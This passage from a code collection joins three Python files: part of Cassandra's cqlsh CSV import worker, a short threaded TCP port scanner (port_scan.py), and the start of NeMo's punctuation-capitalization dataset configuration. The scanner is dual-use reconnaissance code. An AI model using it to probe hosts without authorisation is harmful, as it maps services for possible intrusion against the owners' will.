wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
vals = [v for v in [split('{%s}' % vv, sep=':') for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=long),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=long),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
        For everything else we return nulls: None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else ("0" if self.is_counter else "NULL")
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception, e:
if self.debug:
traceback.print_exc()
                raise ParseError("Failed to parse %s : %s" % (v, e.message))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
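            # Each component of a composite partition key is encoded as
            # <2-byte big-endian length><serialized value><0 byte> and the components are
            # concatenated, which is what the struct.pack(">H%dsB", ...) call below produces.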
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
    than the token classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
        # Note that metadata refresh is disabled by default and we currently do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
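    # For example (illustrative only): with ring = [-100, 0, 100], a token value of 50 maps to
    # ring position 2 via bisect_right(), while a value of 150 wraps around to position 0.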
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return filter(lambda r: r.is_up is not False and r.datacenter == self.local_dc, shuffled) if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy
"""
def __init__(self, local_dc='', used_hosts_per_remote_dc=0):
DCAwareRoundRobinPolicy.__init__(self, local_dc, used_hosts_per_remote_dc)
def make_query_plan(self, working_keyspace=None, query=None):
"""
        Extend DCAwareRoundRobinPolicy.make_query_plan() so that the replicas attached to the query
        are tried first and, most importantly, we avoid repeating the (slow) bisect.
"""
replicas = query.replicas if hasattr(query, 'replicas') else []
for r in replicas:
yield r
for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query):
if r not in replicas:
yield r
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c.encode(self.encoding) for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(local_dc=self.local_dc),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
self._session = cluster.connect(self.ks)
self._session.default_timeout = None
return self._session
def run(self):
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
self.report_error(exc)
finally:
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
except Exception, exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception, exc:
print "Failed to make batch statement: {}".format(exc)
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch = self.maybe_inject_failures(batch)
if failed_batch:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
def make_full_query(r):
where_clause = []
set_clause = []
for i, value in enumerate(r):
if i in conv.primary_key_indexes:
where_clause.append("%s=%s" % (self.valid_columns[i], value))
else:
set_clause.append("%s=%s+%s" % (self.valid_columns[i], self.valid_columns[i], value))
return query % (','.join(set_clause), ' AND '.join(where_clause))
if len(batch['rows']) == 1:
statement = SimpleStatement(make_full_query(batch['rows'][0]), consistency_level=self.consistency_level)
else:
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(make_full_query(row))
statement.replicas = replicas
statement.keyspace = self.ks
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
if len(batch['rows']) == 1:
statement = query.bind(batch['rows'][0])
else:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
statement.replicas = replicas
statement.keyspace = self.ks
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
if len(batch['rows']) == 1:
statement = SimpleStatement(query % (','.join(batch['rows'][0]),), consistency_level=self.consistency_level)
else:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement._statements_and_parameters = [(False, query % (','.join(r),), ()) for r in batch['rows']]
statement.replicas = replicas
statement.keyspace = self.ks
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception, err:
errors[err.message].append(r)
return None
converted_rows = filter(None, [convert_row(r) for r in rows])
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
        Examine self.test_failures and see if this batch is either one that is supposed to fail
        (failing_batch), in which case we return a statement that will fail, or one that should
        terminate the worker process (exit_batch). Otherwise we return None so that the normal
        statement is used.
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
return None # carry on as normal
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
        it may not be possible; in this case it helps to increase the CHUNK SIZE, but only up to a limit,
        otherwise we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
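        # In short: group rows by ring position first; positions with more than min_batch_size rows
        # are batched directly (any of their live replicas may be used), everything else is
        # re-grouped under a single chosen replica and batched further down.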
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception, e:
errors[e.message].append(row)
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.iteritems():
if len(rows) > min_batch_size:
for i in xrange(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[filter_replicas(replicas[ring_pos])[:1]].extend(rows)
# Now send the batches by replica
for replicas, rows in rows_by_replica.iteritems():
for i in xrange(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
self.outmsg.send(ImportTaskError(err.__class__.__name__, err.message, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
            remaining_time = self.update_interval - time_difference  # time left until the next update
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
port_scan.py
|
# import pdb
import socket, threading
from traceback import print_exc
class AllThreadsStarted(Exception): pass
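# Example usage (illustrative only): IPv4PortScanner("127.0.0.1", port_range=(20, 120)).run()
# scans ports 20 to 120 with at most `threadcount` concurrent connection attempts.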
class IPv4PortScanner(object):
def __init__(self, domain, timeout=2.0, port_range=(1024, 65535), threadcount=10):
self.domain = domain
self.timeout = timeout
self.port_range = port_range
self.threadcount = threadcount
self._lock = threading.Lock()
self._condition = threading.Condition(self._lock)
self._ports_active = []
self._ports_being_checked = []
self._next_port = self.port_range[0]
def check_port_(self, port):
"If connects then port is active"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(self.timeout)
try:
sock.connect((self.domain, port))
with self._lock:
self._ports_active.append(port)
print ("Found active port {}".format(port))
sock.close()
except socket.timeout, ex:
return
except:
print_exc()
# pdb.set_trace()
def check_port(self, port):
"updates self._ports_being_checked list on exit of this method"
try:
self.check_port_(port)
finally:
self._condition.acquire()
self._ports_being_checked.remove(port)
self._condition.notifyAll()
self._condition.release()
def start_another_thread(self):
if self._next_port > self.port_range[1]:
raise AllThreadsStarted()
port = self._next_port
self._next_port += 1
t = threading.Thread(target=self.check_port, args=(port,))
        # update bookkeeping before starting the thread
with self._lock:
self._ports_being_checked.append(port)
t.start()
def run(self):
try:
while True:
self._condition.acquire()
while len(self._ports_being_checked) >= self.threadcount:
# we wait for some threads to complete the task
self._condition.wait()
slots_available = self.threadcount - len(self._ports_being_checked)
self._condition.release()
print ("Checking {} - {}".format(self._next_port, self._next_port+slots_available))
for i in xrange(slots_available):
self.start_another_thread()
except AllThreadsStarted, ex:
print ("All threads started ...")
except:
print_exc()
if __name__ == "__main__":
import sys
domain = sys.argv[1]
port_s = int(sys.argv[2])
port_e = int(sys.argv[3])
scanner = IPv4PortScanner(domain=domain, port_range=(port_s, port_e))
scanner.run()
|
punctuation_capitalization_dataset.py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'BertPunctuationCapitalizationDataset',
'LABEL_ID_DIR_FOR_NEMO_CHECKPOINT',
'Progress',
'PunctuationCapitalizationEvalDataConfig',
'PunctuationCapitalizationLexicalAudioTrainDataConfig',
'PunctuationCapitalizationLexicalAudioEvalDataConfig',
'PunctuationCapitalizationTrainDataConfig',
'create_label_ids',
'create_masks_and_segment_ids',
'is_legacy_data_config',
'legacy_data_config_to_new_data_config',
'load_label_ids',
'raise_not_equal_labels_error',
'save_label_ids',
]
import itertools
import multiprocessing as mp
import os
import pickle
import random
from dataclasses import dataclass
from math import ceil
from pathlib import Path
from queue import Empty
from time import sleep
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import numpy as np
import torch
from omegaconf import MISSING, DictConfig, OmegaConf
from tqdm import tqdm
from nemo.collections.common.tokenizers.tokenizer_spec import TokenizerSpec
from nemo.collections.nlp.data.data_utils.data_preprocessing import get_label_stats, get_stats
from nemo.core.classes import Dataset
from nemo.core.neural_types import ChannelType, LabelsType, MaskType, NeuralType
from nemo.utils import logging
from nemo.utils.get_rank import is_global_rank_zero
MAX_NUM_QUERIES_IN_SPLIT = 10 ** 4
TOKENIZATION_PROGRESS_REPORT_PERIOD = 10 ** 3
BATCH_MARK_UP_PROGRESS_REPORT_PERIOD = 10 ** 4
BATCH_BUILDING_PROGRESS_REPORT_PERIOD = 10 ** 4
LABEL_ID_DIR_FOR_NEMO_CHECKPOINT = "label_id_files_for_nemo_checkpoint"
@dataclass
class PunctuationCapitalizationDataConfigBase:
"""A base class for punctuation and capitalization data configs. This class does not define ``ds_item``
attribute which works differently for train and evaluation data."""
###################################################
# PARAMETERS COMMON FOR REGULAR AND TARRED DATASETS
###################################################
use_tarred_dataset: bool = MISSING
"""Whether to use tarred dataset. If True, then you should provide ``tar_metadata_file``. Otherwise, you should
provide ``text_file``, ``labels_file``, ``tokens_in_batch``."""
label_info_save_dir: Optional[str] = None
"""A path to a directory where files created during dataset processing are stored. These files include label id
files and label stats files. By default, it is a directory containing ``text_file`` or ``tar_metadata_file``.
You may need this parameter if dataset directory is read-only and thus does not allow saving anything near dataset
files"""
#################################################
# REGULAR DATASET PARAMETERS
#################################################
text_file: Optional[str] = None
"""A path to a file with source text data without punctuation and capitalization."""
labels_file: Optional[str] = None
"""A path to a file with punctuation and capitalization labels in NeMo format. NeMo format is described in
`documentation
<https://docs.nvidia.com/deeplearning/nemo/user-guide/docs/en/main/nlp/punctuation_and_capitalization.html#nemo-data-format>`_
"""
tokens_in_batch: Optional[int] = None
"""Number of tokens in a batch including paddings and special tokens ([CLS], [SEP], [UNK]). This config does
not have ``batch_size`` parameter."""
max_seq_length: int = 512
"""Max number of tokens in a source sequence. ``max_seq_length`` includes [CLS] and [SEP] tokens. Sequences
which are too long will be clipped by removal of tokens from the end of a sequence."""
num_samples: int = -1
"""A number of samples loaded from ``text_file`` and ``labels_file`` which are used in the dataset. If this
parameter equals ``-1``, then all samples are used."""
use_cache: bool = True
"""Whether to use pickled features. If pickled features file does not exist or ``use_cache=False``, then features
are pickled in ``cache_dir``. Pickled features include input ids, subtokens mask (mask of first tokens in words),
encoded punctuation and capitalization labels, label ids. Features creation consumes considerable time, so
``use_cache=True`` significantly speeds up training startup. Pickled features are also used for sharing features
between processes if data parallel training is used."""
cache_dir: Optional[str] = None
"""A path to a directory containing cache or directory where newly created cache is saved. By default, it is
a directory containing ``text_file``. You may need this parameter if cache for a dataset is going to be created
and the dataset directory is read-only.
``cache_dir`` and ``label_info_save_dir`` are separate parameters for the case when a cache is ready and this cache
is stored in a read-only directory. In this case you will need a separate ``label_info_save_dir``."""
get_label_frequences: bool = False
"""Whether to show and save label frequencies. Frequencies are showed if ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into ``label_info_save_dir``"""
verbose: bool = True
"""If ``True`` dataset instance will print progress messages and examples of acquired features."""
n_jobs: Optional[int] = 0
"""Number of workers used for features creation (tokenization, label encoding, and clipping). If 0, then
multiprocessing is not used; if ``None``, then n_jobs is equal to the number of CPU cores.
There can be weird deadlocking errors with some tokenizers (e.g. SentencePiece) if ``n_jobs`` is greater than zero.
"""
#################################################
# TARRED DATASET PARAMETERS
#################################################
tar_metadata_file: Optional[str] = None
"""A path to tarred dataset metadata file. Tarred metadata file and other parts of tarred dataset are usually
created by the script
`examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py
<https://github.com/NVIDIA/NeMo/blob/main/examples/nlp/token_classification/data/create_punctuation_capitalization_tarred_dataset.py>`_
"""
tar_shuffle_n: int = 1
"""The size of shuffle buffer of `webdataset`. The number of batches which are permuted."""
#################################################
# PYTORCH DATALOADER PARAMETERS
#################################################
shuffle: bool = True
"""Shuffle batches every epoch. For regular training datasets, the parameter also activates batch repacking every
epoch. For tarred dataset, it would be only batches permutation."""
drop_last: bool = False
"""In cases when data parallelism is used, ``drop_last`` defines the way data pipeline behaves when some replicas
are out of data and some are not. If ``drop_last`` is ``True``, then epoch ends in the moment when any replica runs
out of data. If ``drop_last`` is ``False``, then the replica will replace missing batch with a batch from a pool of
batches that the replica has already processed. If data parallelism is not used, then parameter ``drop_last`` does
not do anything. For more information see ``torch.utils.data.distributed.DistributedSampler``"""
pin_memory: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
num_workers: int = 8
"""See ``torch.utils.data.DataLoader`` documentation."""
persistent_workers: bool = True
"""See ``torch.utils.data.DataLoader`` documentation."""
@dataclass
class PunctuationCapitalizationLexicalAudioTrainDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
audio_manifest_filepath: Optional[str] = MISSING
sample_rate: int = 8000
batch_size: int = 32
@dataclass
class PunctuationCapitalizationLexicalAudioEvalDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
audio_manifest_filepath: Optional[str] = MISSING
sample_rate: int = 8000
batch_size: int = 32
@dataclass
class PunctuationCapitalizationTrainDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[str] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay."""
@dataclass
class PunctuationCapitalizationEvalDataConfig(PunctuationCapitalizationDataConfigBase):
ds_item: Optional[Any] = MISSING
"""Path to a directory where `tar_metadata_file` or `text_file` and `labels_file` lay. ``Any`` = ``str`` or
``List[str]``. If a ``List[str]``, then the model is tested or validated on several datasets."""
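# A minimal sketch of assembling a regular (non-tarred) training data config via OmegaConf. The
# directory and file names below are placeholders, not files shipped with NeMo:
#   cfg = OmegaConf.structured(
#       PunctuationCapitalizationTrainDataConfig(
#           use_tarred_dataset=False,
#           ds_item='/data/punct',           # directory containing the two files below
#           text_file='text_train.txt',
#           labels_file='labels_train.txt',
#           tokens_in_batch=5000,
#       )
#   )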
def is_legacy_data_config(ds_section: DictConfig) -> bool:
return 'use_tarred_dataset' not in ds_section
def legacy_data_config_to_new_data_config(
ds_section: DictConfig, legacy_dataset_section: DictConfig, train: bool
) -> DictConfig:
"""
Transform old style dataset to new format dataset.
Args:
ds_section: a dataset section (``train_ds``, or ``validation_ds``, or ``test_ds``) from an old style config. Such
a section contains the ``batch_size`` parameter.
legacy_dataset_section: a ``model.dataset`` section. ``model.dataset`` section contains ``data_dir`` parameter
train: ``True`` if ``train_ds`` is transformed and ``False`` otherwise
Returns:
New format dataset based on either ``PunctuationCapitalizationTrainDataConfig`` (``train=True``) or
``PunctuationCapitalizationEvalDataConfig`` (``train=False``)
"""
if train:
cls = PunctuationCapitalizationTrainDataConfig
ds_item = legacy_dataset_section.get('data_dir')
else:
cls = PunctuationCapitalizationEvalDataConfig
ds_item = ds_section.get('ds_item')
ds_item = legacy_dataset_section.get('data_dir') if ds_item is None else ds_item
if ds_item is None:
raise ValueError(
f"Data directory was not found in legacy config.\nspecific dataset configuration:\n"
f"{OmegaConf.to_yaml(ds_section)}\nmodel.dataset:\n{OmegaConf.to_yaml(legacy_dataset_section)}"
)
new_config = OmegaConf.structured(
cls(
use_tarred_dataset=False,
text_file=ds_section.text_file,
labels_file=ds_section.labels_file,
ds_item=ds_item,
max_seq_length=legacy_dataset_section.get(
'max_seq_length', PunctuationCapitalizationDataConfigBase.max_seq_length
),
)
)
return new_config
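# Illustrative use of the converter above. `old_train_ds` and `old_model_dataset` are hypothetical
# DictConfig sections taken from a legacy config:
#   if is_legacy_data_config(old_train_ds):
#       old_train_ds = legacy_data_config_to_new_data_config(old_train_ds, old_model_dataset, train=True)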
def _check_number_of_labels(
words: List[str],
query: str,
qi: int,
split_i: int,
punctuation_labels: List[str],
capitalization_labels: List[str],
) -> None:
if len(words) != len(punctuation_labels):
raise ValueError(
f"Number of punctuation labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of punctuation labels: "
f"{len(punctuation_labels)}. First 100 characters of the query: '{query[:100]}', punctuation labels: "
f"'{punctuation_labels}'"
)
if len(words) != len(capitalization_labels):
raise ValueError(
f"Number of capitalization labels for a query number {qi} in a split number {split_i} is not equal to "
f"number of words. Number of words: {len(words)}, number of capitalization labels: "
f"{len(capitalization_labels)}. First 100 characters of the query: '{query[:100]}', "
f"capitalization labels: '{capitalization_labels}'"
)
def _show_prog(queues: Tuple[mp.Queue, ...], totals: List[int], descriptions: List[str], units: List[str]) -> None:
"""
Show several ``tqdm`` progress bars.
Args:
queues: a list of queues by which progress is delivered into this function. Each queue is responsible for one
progress bar. ``show_prog`` function extracts integers from ``queues`` elements and adds them to progress
bars. If value extracted from a queue equals ``-1``, then corresponding progress bar is closed. When all
progress bars are closed, this function returns.
